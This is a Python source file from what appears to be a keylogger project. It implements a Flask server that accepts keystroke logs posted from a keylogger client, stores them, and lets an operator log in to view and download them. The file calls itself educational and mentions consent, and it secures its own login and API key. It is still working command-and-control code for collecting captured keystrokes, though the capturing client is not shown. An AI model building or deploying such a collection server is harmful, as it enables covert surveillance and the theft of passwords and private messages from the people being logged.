""" Web Server Module Flask web server to view and download keylogger logs. For educational purposes only. """ import os import sys import json import secrets import argparse import string from functools import wraps from flask import Flask, render_template_string, send_file, request, Response # ASCII Art Banner BANNER = r""" __ __ _ ____ \ \ / /__| |__ / ___| ___ _ ____ _____ _ __ \ \ /\ / / _ \ '_ \ \___ \ / _ \ '__\ \ / / _ \ '__| \ V V / __/ |_) | ___) | __/ | \ V / __/ | \_/\_/ \___|_.__/ |____/ \___|_| \_/ \___|_| Github: https://github.com/Stalin-143 """ app = Flask(__name__) # Set a secure secret key for session management app.secret_key = os.getenv('FLASK_SECRET_KEY', secrets.token_hex(32)) # Global configuration CONFIG = { 'log_file_path': 'logs/keylog.txt', 'username': 'admin', 'password': 'admin', 'api_key': None } MAX_LOG_PAYLOAD_BYTES = 64 * 1024 MIN_PASSWORD_LENGTH = 12 MIN_API_KEY_LENGTH = 24 MIN_API_KEY_UNIQUE_CHARS = 8 def check_auth(username, password): """ Check if username and password are valid using secure comparison. Args: username (str): Username to check password (str): Password to check Returns: bool: True if valid, False otherwise """ # Use secrets.compare_digest for constant-time comparison to prevent timing attacks username_match = secrets.compare_digest(username, CONFIG['username']) password_match = secrets.compare_digest(password, CONFIG['password']) return username_match and password_match def authenticate(): """Send a 401 response to enable basic auth.""" return Response( 'Unauthorized Access. Please log in with correct credentials.', 401, {'WWW-Authenticate': 'Basic realm="Login Required"'} ) def requires_auth(f): """ Decorator to enforce authentication on routes. Args: f: Function to decorate Returns: Decorated function """ @wraps(f) def decorated(*args, **kwargs): auth = request.authorization if not auth or not check_auth(auth.username, auth.password): return authenticate() return f(*args, **kwargs) return decorated def has_valid_api_key(): """ Validate API key for log ingestion endpoint. Returns: bool: True when API key is configured and valid """ configured_api_key = CONFIG.get('api_key') request_api_key = request.headers.get('X-API-Key') if not configured_api_key or not request_api_key: return False return secrets.compare_digest(request_api_key, configured_api_key) def is_strong_password(password): """ Validate password complexity requirements. Args: password (str): Password to validate Returns: bool: True when password meets complexity requirements """ has_upper = any(char.isupper() for char in password) has_lower = any(char.islower() for char in password) has_digit = any(char.isdigit() for char in password) has_special = any(char in string.punctuation for char in password) return has_upper and has_lower and has_digit and has_special def has_sufficient_key_entropy(value): """ Basic entropy checks for shared API key quality. Args: value (str): API key value Returns: bool: True when key has enough character variety """ if not value: return False if len(set(value)) < MIN_API_KEY_UNIQUE_CHARS: return False return True # HTML template to display the log contents and provide a download link HTML_TEMPLATE = '''
{{ log_contents }}
Download Log File
'''
@app.route('/', methods=['GET'])
@requires_auth
def home():
"""
Display the log file contents.
Returns:
HTML page with log contents
"""
log_file_path = CONFIG['log_file_path']
if os.path.exists(log_file_path):
try:
# Read file with size limit to prevent memory exhaustion
MAX_FILE_SIZE = 10 * 1024 * 1024 # 10MB limit
file_size = os.path.getsize(log_file_path)
if file_size > MAX_FILE_SIZE:
# For large files, read only the last portion
with open(log_file_path, 'r') as file:
file.seek(max(0, file_size - MAX_FILE_SIZE))
log_contents = file.read()
log_contents = f"[Showing last {MAX_FILE_SIZE/1024/1024:.1f}MB of {file_size/1024/1024:.1f}MB file]\n\n" + log_contents
else:
with open(log_file_path, 'r') as file:
log_contents = file.read()
except Exception as e:
log_contents = f"Error reading log file: {e}"
else:
log_contents = "Log file not found."
return render_template_string(
HTML_TEMPLATE,
log_file_path=log_file_path,
log_contents=log_contents
)
@app.route('/download', methods=['GET'])
@requires_auth
def download_log():
"""
Download the log file.
Returns:
File download response or error message
"""
log_file_path = CONFIG['log_file_path']
if os.path.exists(log_file_path):
return send_file(log_file_path, as_attachment=True)
return "Log file not found."
@app.route('/', methods=['POST'])
def receive_log():
"""
Receive log data from keylogger.
Returns:
Success or error message
"""
try:
if not has_valid_api_key():
return "Unauthorized", 401
log_data = request.form.get('log', '')
if log_data:
if len(log_data.encode('utf-8')) > MAX_LOG_PAYLOAD_BYTES:
return "Log payload too large", 413
log_file_path = CONFIG['log_file_path']
# Ensure log directory exists
log_dir = os.path.dirname(log_file_path)
if log_dir and not os.path.exists(log_dir):
os.makedirs(log_dir, exist_ok=True)
# Append log data to file
with open(log_file_path, 'a', encoding='utf-8') as f:
f.write(log_data)
return "Log received successfully", 200
return "No log data provided", 400
except Exception as e:
return f"Error: {str(e)}", 500
def load_config(config_path):
"""
Load configuration from JSON file.
Args:
config_path (str): Path to the config file
Returns:
dict: Configuration dictionary
"""
try:
with open(config_path, 'r') as f:
return json.load(f)
except FileNotFoundError:
print(f"Warning: Config file not found at {config_path}")
print("Using default configuration.")
return {}
except json.JSONDecodeError as e:
print(f"Error: Invalid JSON in config file: {e}")
return {}
def main():
"""Main function to run the web server."""
print(BANNER)
parser = argparse.ArgumentParser(
description='Web Server for Keylogger - For educational purposes only',
epilog='Always obtain explicit consent before using monitoring tools.'
)
parser.add_argument(
'--config',
default='config/config.json',
help='Path to configuration file (default: config/config.json)'
)
parser.add_argument(
'--log-file',
help='Override log file path from config'
)
parser.add_argument(
'--host',
default='0.0.0.0',
help='Host to bind to (default: 0.0.0.0)'
)
parser.add_argument(
'--port',
type=int,
default=5000,
help='Port to bind to (default: 5000)'
)
parser.add_argument(
'--debug',
action='store_true',
help='Enable debug mode'
)
args = parser.parse_args()
# Load configuration
config = load_config(args.config)
server_config = config.get('web_server', {})
# Update global config
CONFIG['log_file_path'] = args.log_file or server_config.get('log_file_path', 'logs/keylog.txt')
# Load credentials from environment variables
CONFIG['username'] = os.getenv('WEB_SERVER_USERNAME')
CONFIG['password'] = os.getenv('WEB_SERVER_PASSWORD')
CONFIG['api_key'] = os.getenv('LOG_INGEST_API_KEY')
# Validate that credentials are set
if not CONFIG['username'] or not CONFIG['password']:
print("ERROR: Authentication credentials not set!")
print("Please set WEB_SERVER_USERNAME and WEB_SERVER_PASSWORD environment variables.")
print("Example:")
print(" export WEB_SERVER_USERNAME=admin")
print(" export WEB_SERVER_PASSWORD=your_secure_password")
print("\nOr source your .env file:")
print(" source config/.env")
sys.exit(1)
if CONFIG['password'] == 'admin':
sys.exit("ERROR: Authentication secret uses a disallowed default value.")
if len(CONFIG['password']) < MIN_PASSWORD_LENGTH or not is_strong_password(CONFIG['password']):
sys.exit("ERROR: Authentication secret does not meet complexity policy.")
if not CONFIG['api_key']:
sys.exit("ERROR: Ingestion API secret is required.")
if len(CONFIG['api_key']) < MIN_API_KEY_LENGTH:
sys.exit("ERROR: Ingestion API secret does not meet length policy.")
if not has_sufficient_key_entropy(CONFIG['api_key']):
sys.exit("ERROR: Ingestion API secret does not meet entropy policy.")
# Get server settings
host = args.host or server_config.get('host', '0.0.0.0')
port = args.port or server_config.get('port', 5000)
debug = args.debug or server_config.get('debug', False)
if debug and host not in ('127.0.0.1', 'localhost', '::1'):
print("ERROR: Debug mode is only allowed on localhost interfaces.")
print("Use a local host binding or disable --debug.")
sys.exit(1)
print(f"\nStarting web server on {host}:{port}")
print(f"Log file path: {CONFIG['log_file_path']}")
print(f"Username: {CONFIG['username']}")
print("-" * 50)
app.run(host=host, port=port, debug=debug)
if __name__ == '__main__':
main()